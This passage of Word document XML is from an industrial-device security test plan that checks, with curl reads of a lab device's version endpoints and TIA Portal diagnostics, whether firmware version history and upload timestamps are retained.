            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BE4FEFD" w14:textId="45E3643C"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906341" w:rsidRPr="006D5B9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6D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59BC6332" w14:textId="64FC8BDC"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Sequential-upload history test: two successive firmware uploads (v_A </w:t>
            </w:r>
            <w:r w:rsidR="003404D5" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> v_B); after each, query for any record of the previous version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B366509" w14:textId="0E5B9DD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G-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC43FB0"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§3.2 / §7; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60CEC503" w14:textId="62CC2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ISTG-FW[UPDT]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7768ED83" w14:textId="4E1971C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SVV-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59CC6B2A" w14:textId="42D4B3D9"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Per-upload timestamp test: after an upload, check whether any absolute date/time is attached to the version change</w:t>
            </w:r>
            <w:r w:rsidR="00AD6EB8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (reuse TC-RQ003-04 method)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1238108A" w14:textId="38B1FCD3"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Proves G-2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BDF2F4A" w14:textId="749A1C5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NIST SP 800-115 §3.2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C25E35B" w14:textId="79E46EBA" w:rsidR="00906341" w:rsidRPr="006D5B99"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6341" w:rsidRPr="006D5B9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6D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72877E9E" w14:textId="4B78C2E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External-record verification: assess whether Release Notes provide per-serial, timestamped, tamper-evident, 5-year records for this unit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53115853" w14:textId="72D97F44"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1CF436C3" w14:textId="77777777"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§3.1; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B765BC4" w14:textId="5FE58F69"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OWASP FSTM Stage 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66AB5275" w14:textId="04BB8E4F" w:rsidR="00906341" w:rsidRPr="006D5B99"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SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="299A32A7" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28DAF647" w14:textId="77777777" w:rsidR="00725AAA" w:rsidRPr="006D5B99" w:rsidRDefault="00725AAA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B95F23C" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEED4DB" w14:textId="77777777" w:rsidR="005B34C4" w:rsidRPr="006D5B99" w:rsidRDefault="005B34C4" w:rsidP="005B34C4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5468B34B" w14:textId="42F1AA6A" w:rsidR="005B34C4" w:rsidRPr="006D5B99" w:rsidRDefault="005B34C4" w:rsidP="005B34C4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00536795">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ013-01 - </w:t>
      </w:r>
      <w:r w:rsidR="00DA69C2" w:rsidRPr="00536795">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Current-Version-Only Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB32700" w14:textId="77777777" w:rsidR="005B34C4" w:rsidRPr="006D5B99" w:rsidRDefault="005B34C4" w:rsidP="005B34C4">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9D2A32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60C4113D" w14:textId="386CAA8D"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D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve">RQ-013 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.9 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B34C4" w:rsidRPr="006D5B99"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21E81234" w14:textId="6B4348C2" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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802FB48" w14:textId="47EEA3A5" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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6D5B99"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2EF2DDC6" w14:textId="63CDF9F7" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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Confirm that only the current version is exposed and that no historical or previous-version fields exist via the identification interface and identity records.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B34C4" w:rsidRPr="006D5B99"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7AA814F8"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all version fields via the identification interface.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3970C6" w14:textId="77777777" w:rsidR="00FE351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version-bearing identity records.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="553B9F4A" w14:textId="3FA81E17" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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previous-version or upload-history field.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B34C4" w:rsidRPr="006D5B99"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3647E348" w14:textId="7EE71EE3" w:rsidR="00FE351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query able per-upload history is exposed. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52F939CA" w14:textId="680C2DDA" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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history field exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BB4E50A" w14:textId="77777777" w:rsidR="005B34C4" w:rsidRPr="006D5B99" w:rsidRDefault="005B34C4" w:rsidP="005B34C4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C35E91"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29B036F3"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5A3CDBD9" w14:textId="3F6FEA60" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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TC-RQ013-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00285E74" w:rsidRPr="006D5B99"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285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E74">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A77AE9" w14:textId="19DA05AF" w:rsidR="00285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E74">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Kali (curl), TIA (I&amp;M).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00285E74" w:rsidRPr="006D5B99"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285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E74">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="619B83E0" w14:textId="5C18B79B" w:rsidR="00285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E74">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285E74" w:rsidRPr="006D5B99"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285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E74">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CD25250" w14:textId="77777777" w:rsidR="00285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E74">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export SRIO=192.168.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BACA28E" w14:textId="77777777" w:rsidR="00285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E74">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-s http://$SRIO/deviceinfo/swrevision/getdata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78E4CCBE" w14:textId="77777777" w:rsidR="00285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E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http://$SRIO/firmware/version/getdata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C8F86D6" w14:textId="77777777" w:rsidR="00285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E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In TIA: Online &amp; Diagnostics &gt; Identification &amp; Maintenance &gt; I&amp;M0, I&amp;M5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2934BCA6" w14:textId="77777777" w:rsidR="00285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E74">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Explicitly search all responses for any ‘version history’ / ‘previous</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="478558D1" w14:textId="6735FE59" w:rsidR="00285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E74">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6D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
              <w:t># version’ field (none documented).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00285E74" w:rsidRPr="006D5B99" w14:paraId="3595D61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285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E74">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0991B33D" w14:textId="552B5C7E" w:rsidR="00285E74" w:rsidRPr="006D5B99" w:rsidRDefault="00285E74" w:rsidP="00285E74">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6D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected FAIL (against the requirement) </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> only the current version is retrievable, no history field exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15DC3520" w14:textId="77777777" w:rsidR="005B34C4" w:rsidRPr="006D5B99" w:rsidRDefault="005B34C4" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="731A8330" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ013-02 - Sequential-Upload Version-History Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B27B109" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">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7CE9DE14"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7CB0689D" w14:textId="3069633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FE3514" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.8 / CR 2.9 / CR 3.9 </w:t>
            </w:r>
            <w:r w:rsidR="00FE3514" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="006D5B99"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040A9D0B"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r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="006D5B99"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6F3B5F26" w14:textId="3EF3ABE8"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SVV-2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="006D5B99"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4988B589" w14:textId="1024CB27" w:rsidR="00906341" w:rsidRPr="006D5B99"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6D5B99"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4D93BB41"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Record the current version and all version fields.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37839284"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new version; after install, read all version fields.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D98ACFE" w14:textId="77777777" w:rsidR="000B4520"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Search for any device-resident record of the previous version.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67C0E641" w14:textId="75315A59" w:rsidR="00906341" w:rsidRPr="006D5B99"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Upload a further version; repeat the search for both prior versions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="006D5B99"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0595D401" w14:textId="5FF2CB55" w:rsidR="00A11297"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device retains a query able per-upload history including previous versions. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7884B860" w14:textId="6979ED69" w:rsidR="00906341" w:rsidRPr="006D5B99"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Expected FAIL: only the current version is reported; no record of prior uploads persists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="661ADE88" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD7F541"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14115B26"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4C1B887F" w14:textId="3DB39C90" w:rsidR="00906341" w:rsidRPr="006D5B99"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TC-RQ013-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003511C" w:rsidRPr="006D5B99"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03511C" w:rsidRPr="006D5B99" w:rsidRDefault="0003511C" w:rsidP="0003511C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FB9AA1C" w14:textId="7B76074D"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it-IT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>TIA laptop</w:t>
            </w:r>
            <w:r w:rsidR="000E0178" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>Kali (curl, version polling)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003511C" w:rsidRPr="006D5B99"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03511C" w:rsidRPr="006D5B99" w:rsidRDefault="0003511C" w:rsidP="0003511C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CA95CEB" w14:textId="7DA02C49"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03511C" w:rsidRPr="006D5B99"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03511C" w:rsidRPr="006D5B99" w:rsidRDefault="0003511C" w:rsidP="0003511C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04CFEB27"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77CE9BF"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Record the current version and all version fields:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E200F2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cm_rq013-02_v1.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EF2A2BD"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7D59F663"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Official downgrade to an older version (Update state, rotary 999 +</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F4E29F9"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power cycle, upload the OLDER official container as in TC-RQ005-03</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74AD38F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steps 1+3):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="346EE07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w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>02_v2_after_downgrade.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CA586B4"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check for any 'previous version' field (none expected)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="152D6296"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p>
          <w:p w14:paraId="092BDB01"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3. Upgrade back to the current version (repeat step 2 with the current</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="727D65EA"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container):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FBBB6D2" w14:textId="77777777" w:rsidR="0003511C" w:rsidRPr="006D5B99" w:rsidRDefault="0003511C" w:rsidP="0003511C">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http://$SRIO/deviceinfo/swrevision/getdata | tee cm_rq013-02_v3_after_upgrade.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25AB094F" w14:textId="6F617705" w:rsidR="0003511C" w:rsidRPr="006D5B99" w:rsidRDefault="0003511C" w:rsidP="0003511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again for any historical version field</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003511C" w:rsidRPr="006D5B99"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38958677" w:rsidR="0003511C" w:rsidRPr="006D5B99" w:rsidRDefault="0003511C" w:rsidP="0003511C">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F17D5A3" w14:textId="105E500F" w:rsidR="0003511C" w:rsidRPr="006D5B99" w:rsidRDefault="0003511C" w:rsidP="0003511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w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> at no point is the respective previous version additionally stored/displayed alongside the current one.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66DC497A" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFBBC4A" w14:textId="67A423BE" w:rsidR="00906341" w:rsidRPr="006D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ013-03 </w:t>
      </w:r>
      <w:r w:rsidR="00FC0B48" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Per-Upload Timestamp Absence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73733D18" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">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6D5B99"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6D5B99" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="218AE0A8"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6D5B99" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
